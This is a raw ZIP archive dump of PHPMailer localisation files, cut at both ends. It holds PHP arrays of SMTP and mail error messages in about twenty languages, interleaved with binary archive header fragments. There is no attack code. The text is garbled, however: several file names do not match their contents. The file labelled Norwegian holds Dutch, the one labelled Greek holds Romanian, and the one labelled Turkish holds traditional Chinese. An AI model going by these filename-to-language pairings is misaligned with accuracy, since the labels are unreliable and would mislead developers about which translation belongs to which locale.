//$PHPMAILER_LANG['empty_message'] = 'Message body empty'; $PHPMAILER_LANG['encoding'] = 'Ukendt encode-format: '; $PHPMAILER_LANG['execute'] = 'Kunne ikke køre: '; $PHPMAILER_LANG['file_access'] = 'Ingen adgang til fil: '; $PHPMAILER_LANG['file_open'] = 'Fil fejl: Kunne ikke åbne filen: '; $PHPMAILER_LANG['from_failed'] = 'Følgende afsenderadresse er forkert: '; $PHPMAILER_LANG['instantiate'] = 'Kunne ikke initialisere email funktionen.'; //$PHPMAILER_LANG['invalid_address'] = 'Invalid address: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer understøttes ikke.'; $PHPMAILER_LANG['provide_address'] = 'Du skal indtaste mindst en modtagers emailadresse.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP fejl: Følgende modtagere er forkerte: '; //$PHPMAILER_LANG['signing'] = 'Signing Error: '; //$PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() failed.'; //$PHPMAILER_LANG['smtp_error'] = 'SMTP server error: '; //$PHPMAILER_LANG['variable_set'] = 'Cannot set or reset variable: '; //$PHPMAILER_LANG['extension_missing'] = 'Extension missing: '; PK@fZy2phpmailer/phpmailer/language/phpmailer.lang-be.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'Памылка SMTP: памылка ідэнтыфікацыі.'; $PHPMAILER_LANG['connect_host'] = 'Памылка SMTP: нельга ўстанавіць сувязь з SMTP-серверам.'; $PHPMAILER_LANG['data_not_accepted'] = 'Памылка SMTP: звесткі непрынятыя.'; $PHPMAILER_LANG['empty_message'] = 'Пустое паведамленне.'; $PHPMAILER_LANG['encoding'] = 'Невядомая кадыроўка тэксту: '; $PHPMAILER_LANG['execute'] = 'Нельга выканаць каманду: '; $PHPMAILER_LANG['file_access'] = 'Няма доступу да файла: '; $PHPMAILER_LANG['file_open'] = 'Нельга адкрыць файл: '; $PHPMAILER_LANG['from_failed'] = 'Няправільны адрас адпраўніка: '; $PHPMAILER_LANG['instantiate'] = 'Нельга прымяніць функцыю mail().'; $PHPMAILER_LANG['invalid_address'] = 'Нельга даслаць паведамленне, няправільны email атрымальніка: '; $PHPMAILER_LANG['provide_address'] = 'Запоўніце, калі ласка, правільны email атрымальніка.'; $PHPMAILER_LANG['mailer_not_supported'] = ' - паштовы сервер не падтрымліваецца.'; $PHPMAILER_LANG['recipients_failed'] = 'Памылка SMTP: няправільныя атрымальнікі: '; $PHPMAILER_LANG['signing'] = 'Памылка подпісу паведамлення: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'Памылка сувязі з SMTP-серверам.'; $PHPMAILER_LANG['smtp_error'] = 'Памылка SMTP: '; $PHPMAILER_LANG['variable_set'] = 'Нельга ўстанавіць або перамяніць значэнне пераменнай: '; //$PHPMAILER_LANG['extension_missing'] = 'Extension missing: '; PK@fZKK2phpmailer/phpmailer/language/phpmailer.lang-sv.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'SMTP fel: Kunde inte autentisera.'; $PHPMAILER_LANG['connect_host'] = 'SMTP fel: Kunde inte ansluta till SMTP-server.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP fel: Data accepterades inte.'; //$PHPMAILER_LANG['empty_message'] = 'Message body empty'; $PHPMAILER_LANG['encoding'] = 'Okänt encode-format: '; $PHPMAILER_LANG['execute'] = 'Kunde inte köra: '; $PHPMAILER_LANG['file_access'] = 'Ingen åtkomst till fil: '; $PHPMAILER_LANG['file_open'] = 'Fil fel: Kunde inte öppna fil: '; $PHPMAILER_LANG['from_failed'] = 'Följande avsändaradress är felaktig: '; $PHPMAILER_LANG['instantiate'] = 'Kunde inte initiera e-postfunktion.'; $PHPMAILER_LANG['invalid_address'] = 'Felaktig adress: '; $PHPMAILER_LANG['provide_address'] = 'Du måste ange minst en mottagares e-postadress.'; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer stöds inte.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP fel: Följande mottagare är felaktig: '; $PHPMAILER_LANG['signing'] = 'Signerings fel: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() misslyckades.'; $PHPMAILER_LANG['smtp_error'] = 'SMTP server fel: '; $PHPMAILER_LANG['variable_set'] = 'Kunde inte definiera eller återställa variabel: '; $PHPMAILER_LANG['extension_missing'] = 'Tillägg ej tillgängligt: '; PK@fZjS<2phpmailer/phpmailer/language/phpmailer.lang-es.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'Error SMTP: Imposible autentificar.'; $PHPMAILER_LANG['connect_host'] = 'Error SMTP: Imposible conectar al servidor SMTP.'; $PHPMAILER_LANG['data_not_accepted'] = 'Error SMTP: Datos no aceptados.'; $PHPMAILER_LANG['empty_message'] = 'El cuerpo del mensaje está vacío.'; $PHPMAILER_LANG['encoding'] = 'Codificación desconocida: '; $PHPMAILER_LANG['execute'] = 'Imposible ejecutar: '; $PHPMAILER_LANG['file_access'] = 'Imposible acceder al archivo: '; $PHPMAILER_LANG['file_open'] = 'Error de Archivo: Imposible abrir el archivo: '; $PHPMAILER_LANG['from_failed'] = 'La(s) siguiente(s) direcciones de remitente fallaron: '; $PHPMAILER_LANG['instantiate'] = 'Imposible crear una instancia de la función Mail.'; $PHPMAILER_LANG['invalid_address'] = 'Imposible enviar: dirección de email inválido: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer no está soportado.'; $PHPMAILER_LANG['provide_address'] = 'Debe proporcionar al menos una dirección de email de destino.'; $PHPMAILER_LANG['recipients_failed'] = 'Error SMTP: Los siguientes destinos fallaron: '; $PHPMAILER_LANG['signing'] = 'Error al firmar: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() falló.'; $PHPMAILER_LANG['smtp_error'] = 'Error del servidor SMTP: '; $PHPMAILER_LANG['variable_set'] = 'No se pudo configurar la variable: '; $PHPMAILER_LANG['extension_missing'] = 'Extensión faltante: '; PK@fZm2phpmailer/phpmailer/language/phpmailer.lang-nb.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'SMTP-fout: authenticatie mislukt.'; $PHPMAILER_LANG['connect_host'] = 'SMTP-fout: kon niet verbinden met SMTP-host.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP-fout: data niet geaccepteerd.'; $PHPMAILER_LANG['empty_message'] = 'Berichttekst is leeg'; $PHPMAILER_LANG['encoding'] = 'Onbekende codering: '; $PHPMAILER_LANG['execute'] = 'Kon niet uitvoeren: '; $PHPMAILER_LANG['file_access'] = 'Kreeg geen toegang tot bestand: '; $PHPMAILER_LANG['file_open'] = 'Bestandsfout: kon bestand niet openen: '; $PHPMAILER_LANG['from_failed'] = 'Het volgende afzendersadres is mislukt: '; $PHPMAILER_LANG['instantiate'] = 'Kon mailfunctie niet initialiseren.'; $PHPMAILER_LANG['invalid_address'] = 'Ongeldig adres: '; $PHPMAILER_LANG['invalid_hostentry'] = 'Ongeldige hostentry: '; $PHPMAILER_LANG['invalid_host'] = 'Ongeldige host: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer wordt niet ondersteund.'; $PHPMAILER_LANG['provide_address'] = 'Er moet minstens één ontvanger worden opgegeven.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP-fout: de volgende ontvangers zijn mislukt: '; $PHPMAILER_LANG['signing'] = 'Signeerfout: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Verbinding mislukt.'; $PHPMAILER_LANG['smtp_error'] = 'SMTP-serverfout: '; $PHPMAILER_LANG['variable_set'] = 'Kan de volgende variabele niet instellen of resetten: '; $PHPMAILER_LANG['extension_missing'] = 'Extensie afwezig: '; PK@fZ 2phpmailer/phpmailer/language/phpmailer.lang-he.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'שגיאת SMTP: פעולת האימות נכשלה.'; $PHPMAILER_LANG['connect_host'] = 'שגיאת SMTP: לא הצלחתי להתחבר לשרת SMTP.'; $PHPMAILER_LANG['data_not_accepted'] = 'שגיאת SMTP: מידע לא התקבל.'; $PHPMAILER_LANG['empty_message'] = 'גוף ההודעה ריק'; $PHPMAILER_LANG['invalid_address'] = 'כתובת שגויה: '; $PHPMAILER_LANG['encoding'] = 'קידוד לא מוכר: '; $PHPMAILER_LANG['execute'] = 'לא הצלחתי להפעיל את: '; $PHPMAILER_LANG['file_access'] = 'לא ניתן לגשת לקובץ: '; $PHPMAILER_LANG['file_open'] = 'שגיאת קובץ: לא ניתן לגשת לקובץ: '; $PHPMAILER_LANG['from_failed'] = 'כתובות הנמענים הבאות נכשלו: '; $PHPMAILER_LANG['instantiate'] = 'לא הצלחתי להפעיל את פונקציית המייל.'; $PHPMAILER_LANG['mailer_not_supported'] = ' אינה נתמכת.'; $PHPMAILER_LANG['provide_address'] = 'חובה לספק לפחות כתובת אחת של מקבל המייל.'; $PHPMAILER_LANG['recipients_failed'] = 'שגיאת SMTP: הנמענים הבאים נכשלו: '; $PHPMAILER_LANG['signing'] = 'שגיאת חתימה: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() failed.'; $PHPMAILER_LANG['smtp_error'] = 'שגיאת שרת SMTP: '; $PHPMAILER_LANG['variable_set'] = 'לא ניתן לקבוע או לשנות את המשתנה: '; //$PHPMAILER_LANG['extension_missing'] = 'Extension missing: '; PK@fZ|7=2phpmailer/phpmailer/language/phpmailer.lang-ba.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'SMTP Greška: Neuspjela prijava.'; $PHPMAILER_LANG['connect_host'] = 'SMTP Greška: Nije moguće spojiti se sa SMTP serverom.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP Greška: Podatci nisu prihvaćeni.'; $PHPMAILER_LANG['empty_message'] = 'Sadržaj poruke je prazan.'; $PHPMAILER_LANG['encoding'] = 'Nepoznata kriptografija: '; $PHPMAILER_LANG['execute'] = 'Nije moguće izvršiti naredbu: '; $PHPMAILER_LANG['file_access'] = 'Nije moguće pristupiti datoteci: '; $PHPMAILER_LANG['file_open'] = 'Nije moguće otvoriti datoteku: '; $PHPMAILER_LANG['from_failed'] = 'SMTP Greška: Slanje sa navedenih e-mail adresa nije uspjelo: '; $PHPMAILER_LANG['recipients_failed'] = 'SMTP Greška: Slanje na navedene e-mail adrese nije uspjelo: '; $PHPMAILER_LANG['instantiate'] = 'Ne mogu pokrenuti mail funkcionalnost.'; $PHPMAILER_LANG['invalid_address'] = 'E-mail nije poslan. Neispravna e-mail adresa: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer nije podržan.'; $PHPMAILER_LANG['provide_address'] = 'Definišite barem jednu adresu primaoca.'; $PHPMAILER_LANG['signing'] = 'Greška prilikom prijave: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'Spajanje na SMTP server nije uspjelo.'; $PHPMAILER_LANG['smtp_error'] = 'SMTP greška: '; $PHPMAILER_LANG['variable_set'] = 'Nije moguće postaviti varijablu ili je vratiti nazad: '; $PHPMAILER_LANG['extension_missing'] = 'Nedostaje ekstenzija: ';PK@fZtL2phpmailer/phpmailer/language/phpmailer.lang-sl.phpnu[ * @author Filip Š */ $PHPMAILER_LANG['authenticate'] = 'SMTP napaka: Avtentikacija ni uspela.'; $PHPMAILER_LANG['connect_host'] = 'SMTP napaka: Vzpostavljanje povezave s SMTP gostiteljem ni uspelo.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP napaka: Strežnik zavrača podatke.'; $PHPMAILER_LANG['empty_message'] = 'E-poštno sporočilo nima vsebine.'; $PHPMAILER_LANG['encoding'] = 'Nepoznan tip kodiranja: '; $PHPMAILER_LANG['execute'] = 'Operacija ni uspela: '; $PHPMAILER_LANG['file_access'] = 'Nimam dostopa do datoteke: '; $PHPMAILER_LANG['file_open'] = 'Ne morem odpreti datoteke: '; $PHPMAILER_LANG['from_failed'] = 'Neveljaven e-naslov pošiljatelja: '; $PHPMAILER_LANG['instantiate'] = 'Ne morem inicializirati mail funkcije.'; $PHPMAILER_LANG['invalid_address'] = 'E-poštno sporočilo ni bilo poslano. E-naslov je neveljaven: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer ni podprt.'; $PHPMAILER_LANG['provide_address'] = 'Prosim vnesite vsaj enega naslovnika.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP napaka: Sledeči naslovniki so neveljavni: '; $PHPMAILER_LANG['signing'] = 'Napaka pri podpisovanju: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'Ne morem vzpostaviti povezave s SMTP strežnikom.'; $PHPMAILER_LANG['smtp_error'] = 'Napaka SMTP strežnika: '; $PHPMAILER_LANG['variable_set'] = 'Ne morem nastaviti oz. ponastaviti spremenljivke: '; $PHPMAILER_LANG['extension_missing'] = 'Manjkajoča razširitev: '; PK@fZ 2phpmailer/phpmailer/language/phpmailer.lang-vi.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'Lỗi SMTP: Không thể xác thực.'; $PHPMAILER_LANG['connect_host'] = 'Lỗi SMTP: Không thể kết nối máy chủ SMTP.'; $PHPMAILER_LANG['data_not_accepted'] = 'Lỗi SMTP: Dữ liệu không được chấp nhận.'; $PHPMAILER_LANG['empty_message'] = 'Không có nội dung'; $PHPMAILER_LANG['encoding'] = 'Mã hóa không xác định: '; $PHPMAILER_LANG['execute'] = 'Không thực hiện được: '; $PHPMAILER_LANG['file_access'] = 'Không thể truy cập tệp tin '; $PHPMAILER_LANG['file_open'] = 'Lỗi Tập tin: Không thể mở tệp tin: '; $PHPMAILER_LANG['from_failed'] = 'Lỗi địa chỉ gửi đi: '; $PHPMAILER_LANG['instantiate'] = 'Không dùng được các hàm gửi thư.'; $PHPMAILER_LANG['invalid_address'] = 'Đại chỉ emai không đúng: '; $PHPMAILER_LANG['mailer_not_supported'] = ' trình gửi thư không được hỗ trợ.'; $PHPMAILER_LANG['provide_address'] = 'Bạn phải cung cấp ít nhất một địa chỉ người nhận.'; $PHPMAILER_LANG['recipients_failed'] = 'Lỗi SMTP: lỗi địa chỉ người nhận: '; $PHPMAILER_LANG['signing'] = 'Lỗi đăng nhập: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'Lỗi kết nối với SMTP'; $PHPMAILER_LANG['smtp_error'] = 'Lỗi máy chủ smtp '; $PHPMAILER_LANG['variable_set'] = 'Không thể thiết lập hoặc thiết lập lại biến: '; //$PHPMAILER_LANG['extension_missing'] = 'Extension missing: '; PK@fZ$ 2phpmailer/phpmailer/language/phpmailer.lang-it.phpnu[ * @author Stefano Sabatini */ $PHPMAILER_LANG['authenticate'] = 'SMTP Error: Impossibile autenticarsi.'; $PHPMAILER_LANG['connect_host'] = 'SMTP Error: Impossibile connettersi all\'host SMTP.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP Error: Dati non accettati dal server.'; $PHPMAILER_LANG['empty_message'] = 'Il corpo del messaggio è vuoto'; $PHPMAILER_LANG['encoding'] = 'Codifica dei caratteri sconosciuta: '; $PHPMAILER_LANG['execute'] = 'Impossibile eseguire l\'operazione: '; $PHPMAILER_LANG['file_access'] = 'Impossibile accedere al file: '; $PHPMAILER_LANG['file_open'] = 'File Error: Impossibile aprire il file: '; $PHPMAILER_LANG['from_failed'] = 'I seguenti indirizzi mittenti hanno generato errore: '; $PHPMAILER_LANG['instantiate'] = 'Impossibile istanziare la funzione mail'; $PHPMAILER_LANG['invalid_address'] = 'Impossibile inviare, l\'indirizzo email non è valido: '; $PHPMAILER_LANG['provide_address'] = 'Deve essere fornito almeno un indirizzo ricevente'; $PHPMAILER_LANG['mailer_not_supported'] = 'Mailer non supportato'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP Error: I seguenti indirizzi destinatari hanno generato un errore: '; $PHPMAILER_LANG['signing'] = 'Errore nella firma: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() fallita.'; $PHPMAILER_LANG['smtp_error'] = 'Errore del server SMTP: '; $PHPMAILER_LANG['variable_set'] = 'Impossibile impostare o resettare la variabile: '; $PHPMAILER_LANG['extension_missing'] = 'Estensione mancante: '; PK@fZ70\2phpmailer/phpmailer/language/phpmailer.lang-uk.phpnu[ * @fixed by Boris Yurchenko */ $PHPMAILER_LANG['authenticate'] = 'Помилка SMTP: помилка авторизації.'; $PHPMAILER_LANG['connect_host'] = 'Помилка SMTP: не вдається під\'єднатися до SMTP-серверу.'; $PHPMAILER_LANG['data_not_accepted'] = 'Помилка SMTP: дані не прийнято.'; $PHPMAILER_LANG['encoding'] = 'Невідоме кодування: '; $PHPMAILER_LANG['execute'] = 'Неможливо виконати команду: '; $PHPMAILER_LANG['file_access'] = 'Немає доступу до файлу: '; $PHPMAILER_LANG['file_open'] = 'Помилка файлової системи: не вдається відкрити файл: '; $PHPMAILER_LANG['from_failed'] = 'Невірна адреса відправника: '; $PHPMAILER_LANG['instantiate'] = 'Неможливо запустити функцію mail().'; $PHPMAILER_LANG['provide_address'] = 'Будь-ласка, введіть хоча б одну email-адресу отримувача.'; $PHPMAILER_LANG['mailer_not_supported'] = ' - поштовий сервер не підтримується.'; $PHPMAILER_LANG['recipients_failed'] = 'Помилка SMTP: не вдалося відправлення для таких отримувачів: '; $PHPMAILER_LANG['empty_message'] = 'Пусте повідомлення'; $PHPMAILER_LANG['invalid_address'] = 'Не відправлено через невірний формат email-адреси: '; $PHPMAILER_LANG['signing'] = 'Помилка підпису: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'Помилка з\'єднання з SMTP-сервером'; $PHPMAILER_LANG['smtp_error'] = 'Помилка SMTP-сервера: '; $PHPMAILER_LANG['variable_set'] = 'Неможливо встановити або скинути змінну: '; $PHPMAILER_LANG['extension_missing'] = 'Розширення відсутнє: '; PK@fZF&2phpmailer/phpmailer/language/phpmailer.lang-mg.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'Hadisoana SMTP: Tsy nahomby ny fanamarinana.'; $PHPMAILER_LANG['connect_host'] = 'SMTP Error: Tsy afaka mampifandray amin\'ny mpampiantrano SMTP.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP diso: tsy voarakitra ny angona.'; $PHPMAILER_LANG['empty_message'] = 'Tsy misy ny votoaty mailaka.'; $PHPMAILER_LANG['encoding'] = 'Tsy fantatra encoding: '; $PHPMAILER_LANG['execute'] = 'Tsy afaka manatanteraka ity baiko manaraka ity: '; $PHPMAILER_LANG['file_access'] = 'Tsy nahomby ny fidirana amin\'ity rakitra ity: '; $PHPMAILER_LANG['file_open'] = 'Hadisoana diso: Tsy afaka nanokatra ity file manaraka ity: '; $PHPMAILER_LANG['from_failed'] = 'Ny adiresy iraka manaraka dia diso: '; $PHPMAILER_LANG['instantiate'] = 'Tsy afaka nanomboka ny hetsika mail.'; $PHPMAILER_LANG['invalid_address'] = 'Tsy mety ny adiresy: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer tsy manohana.'; $PHPMAILER_LANG['provide_address'] = 'Alefaso azafady iray adiresy iray farafahakeliny.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP Error: Tsy mety ireo mpanaraka ireto: '; $PHPMAILER_LANG['signing'] = 'Error nandritra ny sonia:'; $PHPMAILER_LANG['smtp_connect_failed'] = 'Tsy nahomby ny fifandraisana tamin\'ny server SMTP.'; $PHPMAILER_LANG['smtp_error'] = 'Fahadisoana tamin\'ny server SMTP: '; $PHPMAILER_LANG['variable_set'] = 'Tsy azo atao ny mametraka na mamerina ny variable: '; $PHPMAILER_LANG['extension_missing'] = 'Tsy hita ny ampahany: '; PK@fZ`MM2phpmailer/phpmailer/language/phpmailer.lang-ch.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'SMTP 错误:身份验证失败。'; $PHPMAILER_LANG['connect_host'] = 'SMTP 错误: 不能连接SMTP主机。'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP 错误: 数据不可接受。'; //$PHPMAILER_LANG['empty_message'] = 'Message body empty'; $PHPMAILER_LANG['encoding'] = '未知编码:'; $PHPMAILER_LANG['execute'] = '不能执行: '; $PHPMAILER_LANG['file_access'] = '不能访问文件:'; $PHPMAILER_LANG['file_open'] = '文件错误:不能打开文件:'; $PHPMAILER_LANG['from_failed'] = '下面的发送地址邮件发送失败了: '; $PHPMAILER_LANG['instantiate'] = '不能实现mail方法。'; //$PHPMAILER_LANG['invalid_address'] = 'Invalid address: '; $PHPMAILER_LANG['mailer_not_supported'] = ' 您所选择的发送邮件的方法并不支持。'; $PHPMAILER_LANG['provide_address'] = '您必须提供至少一个 收信人的email地址。'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP 错误: 下面的 收件人失败了: '; //$PHPMAILER_LANG['signing'] = 'Signing Error: '; //$PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() failed.'; //$PHPMAILER_LANG['smtp_error'] = 'SMTP server error: '; //$PHPMAILER_LANG['variable_set'] = 'Cannot set or reset variable: '; //$PHPMAILER_LANG['extension_missing'] = 'Extension missing: '; PK@fZzjj2phpmailer/phpmailer/language/phpmailer.lang-lv.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'SMTP kļūda: Autorizācija neizdevās.'; $PHPMAILER_LANG['connect_host'] = 'SMTP Kļūda: Nevar izveidot savienojumu ar SMTP serveri.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP Kļūda: Nepieņem informāciju.'; $PHPMAILER_LANG['empty_message'] = 'Ziņojuma teksts ir tukšs'; $PHPMAILER_LANG['encoding'] = 'Neatpazīts kodējums: '; $PHPMAILER_LANG['execute'] = 'Neizdevās izpildīt komandu: '; $PHPMAILER_LANG['file_access'] = 'Fails nav pieejams: '; $PHPMAILER_LANG['file_open'] = 'Faila kļūda: Nevar atvērt failu: '; $PHPMAILER_LANG['from_failed'] = 'Nepareiza sūtītāja adrese: '; $PHPMAILER_LANG['instantiate'] = 'Nevar palaist sūtīšanas funkciju.'; $PHPMAILER_LANG['invalid_address'] = 'Nepareiza adrese: '; $PHPMAILER_LANG['mailer_not_supported'] = ' sūtītājs netiek atbalstīts.'; $PHPMAILER_LANG['provide_address'] = 'Lūdzu, norādiet vismaz vienu adresātu.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP kļūda: neizdevās nosūtīt šādiem saņēmējiem: '; $PHPMAILER_LANG['signing'] = 'Autorizācijas kļūda: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP savienojuma kļūda'; $PHPMAILER_LANG['smtp_error'] = 'SMTP servera kļūda: '; $PHPMAILER_LANG['variable_set'] = 'Nevar piešķirt mainīgā vērtību: '; //$PHPMAILER_LANG['extension_missing'] = 'Extension missing: '; PK@fZo|2phpmailer/phpmailer/language/phpmailer.lang-am.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'SMTP -ի սխալ: չհաջողվեց ստուգել իսկությունը.'; $PHPMAILER_LANG['connect_host'] = 'SMTP -ի սխալ: չհաջողվեց կապ հաստատել SMTP սերվերի հետ.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP -ի սխալ: տվյալները ընդունված չեն.'; $PHPMAILER_LANG['empty_message'] = 'Հաղորդագրությունը դատարկ է'; $PHPMAILER_LANG['encoding'] = 'Կոդավորման անհայտ տեսակ: '; $PHPMAILER_LANG['execute'] = 'Չհաջողվեց իրականացնել հրամանը: '; $PHPMAILER_LANG['file_access'] = 'Ֆայլը հասանելի չէ: '; $PHPMAILER_LANG['file_open'] = 'Ֆայլի սխալ: ֆայլը չհաջողվեց բացել: '; $PHPMAILER_LANG['from_failed'] = 'Ուղարկողի հետևյալ հասցեն սխալ է: '; $PHPMAILER_LANG['instantiate'] = 'Հնարավոր չէ կանչել mail ֆունկցիան.'; $PHPMAILER_LANG['invalid_address'] = 'Հասցեն սխալ է: '; $PHPMAILER_LANG['mailer_not_supported'] = ' փոստային սերվերի հետ չի աշխատում.'; $PHPMAILER_LANG['provide_address'] = 'Անհրաժեշտ է տրամադրել գոնե մեկ ստացողի e-mail հասցե.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP -ի սխալ: չի հաջողվել ուղարկել հետևյալ ստացողների հասցեներին: '; $PHPMAILER_LANG['signing'] = 'Ստորագրման սխալ: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP -ի connect() ֆունկցիան չի հաջողվել'; $PHPMAILER_LANG['smtp_error'] = 'SMTP սերվերի սխալ: '; $PHPMAILER_LANG['variable_set'] = 'Չի հաջողվում ստեղծել կամ վերափոխել փոփոխականը: '; $PHPMAILER_LANG['extension_missing'] = 'Հավելվածը բացակայում է: '; PK@fZ|b2phpmailer/phpmailer/language/phpmailer.lang-et.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'SMTP Viga: Autoriseerimise viga.'; $PHPMAILER_LANG['connect_host'] = 'SMTP Viga: Ei õnnestunud luua ühendust SMTP serveriga.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP Viga: Vigased andmed.'; $PHPMAILER_LANG['empty_message'] = 'Tühi kirja sisu'; $PHPMAILER_LANG["encoding"] = 'Tundmatu kodeering: '; $PHPMAILER_LANG['execute'] = 'Tegevus ebaõnnestus: '; $PHPMAILER_LANG['file_access'] = 'Pole piisavalt õiguseid järgneva faili avamiseks: '; $PHPMAILER_LANG['file_open'] = 'Faili Viga: Faili avamine ebaõnnestus: '; $PHPMAILER_LANG['from_failed'] = 'Järgnev saatja e-posti aadress on vigane: '; $PHPMAILER_LANG['instantiate'] = 'mail funktiooni käivitamine ebaõnnestus.'; $PHPMAILER_LANG['invalid_address'] = 'Saatmine peatatud, e-posti address vigane: '; $PHPMAILER_LANG['provide_address'] = 'Te peate määrama vähemalt ühe saaja e-posti aadressi.'; $PHPMAILER_LANG['mailer_not_supported'] = ' maileri tugi puudub.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP Viga: Järgnevate saajate e-posti aadressid on vigased: '; $PHPMAILER_LANG["signing"] = 'Viga allkirjastamisel: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() ebaõnnestus.'; $PHPMAILER_LANG['smtp_error'] = 'SMTP serveri viga: '; $PHPMAILER_LANG['variable_set'] = 'Ei õnnestunud määrata või lähtestada muutujat: '; $PHPMAILER_LANG['extension_missing'] = 'Nõutud laiendus on puudu: '; PK@fZVU2phpmailer/phpmailer/language/phpmailer.lang-tr.phpnu[ * @author Peter Dave Hello <@PeterDaveHello/> * @author Jason Chiang */ $PHPMAILER_LANG['authenticate'] = 'SMTP 錯誤:登入失敗。'; $PHPMAILER_LANG['connect_host'] = 'SMTP 錯誤:無法連線到 SMTP 主機。'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP 錯誤:無法接受的資料。'; $PHPMAILER_LANG['empty_message'] = '郵件內容為空'; $PHPMAILER_LANG['encoding'] = '未知編碼: '; $PHPMAILER_LANG['execute'] = '無法執行:'; $PHPMAILER_LANG['file_access'] = '無法存取檔案:'; $PHPMAILER_LANG['file_open'] = '檔案錯誤:無法開啟檔案:'; $PHPMAILER_LANG['from_failed'] = '發送地址錯誤:'; $PHPMAILER_LANG['instantiate'] = '未知函數呼叫。'; $PHPMAILER_LANG['invalid_address'] = '因為電子郵件地址無效,無法傳送: '; $PHPMAILER_LANG['mailer_not_supported'] = '不支援的發信客戶端。'; $PHPMAILER_LANG['provide_address'] = '必須提供至少一個收件人地址。'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP 錯誤:以下收件人地址錯誤:'; $PHPMAILER_LANG['signing'] = '電子簽章錯誤: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP 連線失敗'; $PHPMAILER_LANG['smtp_error'] = 'SMTP 伺服器錯誤: '; $PHPMAILER_LANG['variable_set'] = '無法設定或重設變數: '; $PHPMAILER_LANG['extension_missing'] = '遺失模組 Extension: '; PK@fZ>2phpmailer/phpmailer/language/phpmailer.lang-el.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'Eroare SMTP: Autentificarea a eșuat.'; $PHPMAILER_LANG['connect_host'] = 'Eroare SMTP: Conectarea la serverul SMTP a eșuat.'; $PHPMAILER_LANG['data_not_accepted'] = 'Eroare SMTP: Datele nu au fost acceptate.'; $PHPMAILER_LANG['empty_message'] = 'Mesajul este gol.'; $PHPMAILER_LANG['encoding'] = 'Encodare necunoscută: '; $PHPMAILER_LANG['execute'] = 'Nu se poate executa următoarea comandă: '; $PHPMAILER_LANG['file_access'] = 'Nu se poate accesa următorul fișier: '; $PHPMAILER_LANG['file_open'] = 'Eroare fișier: Nu se poate deschide următorul fișier: '; $PHPMAILER_LANG['from_failed'] = 'Următoarele adrese From au dat eroare: '; $PHPMAILER_LANG['instantiate'] = 'Funcția mail nu a putut fi inițializată.'; $PHPMAILER_LANG['invalid_address'] = 'Adresa de email nu este validă: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer nu este suportat.'; $PHPMAILER_LANG['provide_address'] = 'Trebuie să adăugați cel puțin o adresă de email.'; $PHPMAILER_LANG['recipients_failed'] = 'Eroare SMTP: Următoarele adrese de email au eșuat: '; $PHPMAILER_LANG['signing'] = 'A aparut o problemă la semnarea emailului. '; $PHPMAILER_LANG['smtp_connect_failed'] = 'Conectarea la serverul SMTP a eșuat.'; $PHPMAILER_LANG['smtp_error'] = 'Eroare server SMTP: '; $PHPMAILER_LANG['variable_set'] = 'Nu se poate seta/reseta variabila. '; $PHPMAILER_LANG['extension_missing'] = 'Lipsește extensia: '; PK@fZ60b2phpmailer/phpmailer/language/phpmailer.lang-ja.phpnu[ * @author Yoshi Sakai */ $PHPMAILER_LANG['authenticate'] = 'SMTPエラー: 認証できませんでした。'; $PHPMAILER_LANG['connect_host'] = 'SMTPエラー: SMTPホストに接続できませんでした。'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTPエラー: 